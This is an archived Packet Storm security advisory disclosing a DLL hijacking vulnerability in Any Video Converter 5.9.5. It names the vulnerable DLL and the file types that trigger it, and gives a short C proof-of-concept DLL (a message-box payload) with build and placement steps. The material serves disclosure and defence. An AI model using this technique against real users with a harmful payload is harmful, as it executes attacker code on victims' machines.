exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Any Video Converter 5.9.5 DLL Hijacking

Any Video Converter 5.9.5 DLL Hijacking
Posted Aug 9, 2016
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Any Video Converter version 5.9.5 suffers from a dll hijacking vulnerability.

tags | exploit
SHA-256 | 1536ebf1c3162761ab646ef4b5b94b2153d3b5d816712287cdae8f5d18ede71c

Any Video Converter 5.9.5 DLL Hijacking

Change Mirror Download
[+] Credits: HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/ANY-VIDEO-CONVERTER-DLL-HIJACK.txt


[+] ISR: ApparitionSec



Vendor:
===========================
www.any-video-converter.com



Product:
====================================
AVCSoft / Any Video Converter v5.9.5

AVCFree.exe is a Video downloader and converter.



Vulnerability Type:
====================
DLL Hijack



CVE Reference:
==============
N/A



Vulnerability Details:
=====================


Vuln DLL: libx265_main10.dll

AVCFree.exe will search for an load any DLL named "libx265_main10.dll". If
an attacker can place the DLL in a location
where victim opens a file in AVCFree it will load and run the attackers DLL
and code.

In testing I notice if the file type is associated with AVCFree.exe as
default program to open with then double clicking
the file will load and execute the vuln DLL. If file type is not associated
with AVCFree then right clicking and choosing
to open with AVCFree will do the same.

Right click or Double click and open in AVCFree.exe following file types
then BOOM.

.mp4, .mp3, .mpg, mpeg, .iso, .divx, .wav, .flv, .avs, .mov

and probably more...



Exploit code(s):
===============

1) Save and compile below C code as 'libx265_main10.c' to create vuln DLL

2) Place on remote share or other directory like "downloads"

3) Right click or Double Click an .mpg file or any of extensions listed
above to open with AVCFree.exe then BOOM!


#include<windows.h>

//gcc -c libx265_main10.c
//gcc -shared -o libx265_main10.dll libx265_main10.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Arbitrary Code Exec", "PWNED!", MB_OK);
break;
}

return 0;
}



Disclosure Timeline:
===============================
Vendor Notification: No Replies
August 8, 2016 : Public Disclosure





Severity Level:
================
Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close